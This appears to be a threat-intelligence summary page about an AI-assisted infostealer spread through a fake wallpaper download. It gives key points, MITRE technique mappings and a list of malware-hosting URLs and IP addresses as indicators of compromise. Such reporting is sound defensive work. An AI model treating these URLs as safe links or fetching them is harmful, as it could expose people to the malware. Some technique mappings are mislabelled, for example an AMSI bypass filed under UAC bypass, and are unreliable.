Threat Research

From Chatbots to Cyberattacks: How AI is Helping Hackers Stay One Step Ahead

iocOne
From Chatbots to Cyberattacks: How AI is Helping Hackers Stay One Step Ahead

A malware analysis recounts the author’s unexpected infection through a seemingly innocent wallpaper download. The malware, partially generated by AI, was sophisticated, capable of stealing credentials and actively evading detection. The piece serves as both a cautionary tale and a learning resource for cybersecurity best practices. Affected: personal computer, cloud service platforms, and online storage services

Keypoints :

  • Initial malware infection occurred through a phishing attack disguised as a wallpaper download.
  • The malware was designed to utilize obfuscation techniques and AI-generated code.
  • It exploited the clipboard for executing harmful commands without user consent.
  • The malicious payload was hidden using encryption and steganography techniques.
  • Potential capabilities included credential theft, crypto wallet hijacking, and creating backdoors for remote access.
  • Legitimate services were hijacked to host malware, raising questions about their responsibility.
  • The use of AI in developing malware represents a significant leap for cybercriminals and a rising threat to cybersecurity.
  • A reminder of the importance of personal cybersecurity practices was highlighted in the conclusion.

MITRE Techniques :

  • Execution (T1203): Utilized a phishing website that executed a harmful mshta command to run the malware script down.
  • Obfuscated Files or Information (T1027): The malware employed complex obfuscation techniques to hide its true functions and operations.
  • C2 Communication (T1071): Established command and control communication with remote servers to exfiltrate stolen data.
  • Credential Dumping (T1003): Attempted to acquire passwords and session details from various sources, targeting browsers and applications.
  • Bypass User Account Control (T1088): The malware made attempts to bypass AntiMalware Scan Interface (AMSI) for evading detection.
  • Automated Exfiltration (T1041): Automatically sent stolen data back to attacker-controlled servers.

Indicator of Compromise :

  • [URL] https://snowy-dew-4512.fly.storage.tigris.dev/garden-bloom-alltop.html?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=…
  • [URL] https://update33.oss-ap-southeast-3.aliyuncs.com/ruketop.mp4
  • [URL] https://ddddd.kliprexep.shop/provider.png
  • [IP Address] 185.147.124.181
  • [IP Address] 185.195.97.57

Full Story: https://medium.com/@malek.tababi/from-chatbots-to-cyberattacks-how-ai-is-helping-hackers-stay-one-step-ahead-c3762cba1f20?source=rss——malware-5

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint